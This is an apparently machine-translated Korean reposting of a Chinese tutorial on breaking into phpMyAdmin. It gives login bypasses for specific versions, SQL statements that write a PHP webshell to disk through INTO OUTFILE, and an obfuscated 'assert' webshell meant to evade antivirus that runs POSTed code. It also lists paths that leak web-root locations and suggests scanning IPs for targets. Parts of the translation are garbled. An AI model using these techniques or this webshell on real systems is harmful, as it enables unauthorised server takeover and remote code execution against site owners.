PHPmyadmin 취약점 분석 및 쉘 소개

藏色散人
풀어 주다: 2021-02-10 15:13:37
앞으로
3768명이 탐색했습니다.

phpmyadmin의 다음 튜토리얼 칼럼에서는 PHPmyadmin 취약점과 셸 얻기에 대해 소개할 예정입니다. 이 칼럼이 필요한 친구들에게 도움이 되기를 바랍니다!

PHPmyadmin 취약점 분석 및 쉘 소개

phpmyadmin에는 상대적으로 많은 허점이 있습니다. 코드 감사에 대해 깊이 있는 분들도 저에게 몇 가지 허점을 공유하고 싶습니다
phpmyadmin2.11.3-2.11 .4 이 두 버전에는 범용 비밀번호가 있습니다. 'localhost'@'@"를 계정번호로 직접 사용하면 비밀번호를 입력할 필요가 없습니다.

phpmyadmin2.11.9.2 빈 비밀번호가 있습니다. 이 버전에서는 루트 사용자로 직접 로그인하세요. 비밀번호가 필요하지 않습니다.

이 내용을 찾으려면 자신의 스크립트나 검색 엔진 등을 사용하세요. t, 여기서 신경쓰지 마세요.

셸 얻기에 대해 ---->루트 권한 및 쓰기 권한 있음---"내보낸 디렉터리에 쓰기 권한이 있습니다---" 경우에 따라 둘 다 가지고 있지만 서버의 일부 구성은 여전히 여기에 영향을 미칩니다.

getshell 전에 먼저 데이터베이스를 입력하세요

먼저, SQL 문을 사용하고, 테이블을 만들고, 필드를 추가하고, 필드가 한 문장이면 이를 PHP 파일로 내보낸 다음 마지막으로 테이블을 삭제합니다. 이것이 가장 안전한 방법입니다
Create TABLE table (column text NOT NULL)
Insert INTO table (column) VALUES(' ')
테이블에서 열을 _utfile '경로'로 선택
TABLE IF EXISTS 테이블 삭제
두 번째 방법, 직접 쓰는 방법
'문장' INTO _UTFILE '경로 선택
여러 가지 방법이 있지만 일반적인 원칙은 동일합니다
그러면 일반적으로 한 문장으로 단어가 모두


로그인 후 복사

개를 키우는 경우 "살인을 피하십시오"라는 문장을 사용하십시오. 개를 넘기기 위해 설날 전에 만들었던 문장

 $a = 's';
$str = str_repeat($a,2);
$to = $_POST;
//echo $str;
$exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
$exp($to['x'])
?>
로그인 후 복사

길을 찾고 계시다면

1// 利用phpinfo.php
2//利用phpmyadmin的一些文件报错,下面都是网上通用的
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
/phpmyadmin/libraries/export/xls.php
로그인 후 복사

3//더 나아가서, 웹사이트 패키지 경로를 알고 있으면 알 수 있을 것입니다.

스크립트는 IP를 스캔하여 phpmyadmin이 있음을 보여줍니다. ㅋㅋㅋ
. . .
이 작업은 확실히 완료되었습니다. 권리를 에스컬레이션할 필요가 없습니다.

위 내용은 PHPmyadmin 취약점 분석 및 쉘 소개의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:csdn.net
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
최신 이슈
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿
회사 소개 부인 성명 Sitemap
PHP 중국어 웹사이트:공공복지 온라인 PHP 교육,PHP 학습자의 빠른 성장을 도와주세요!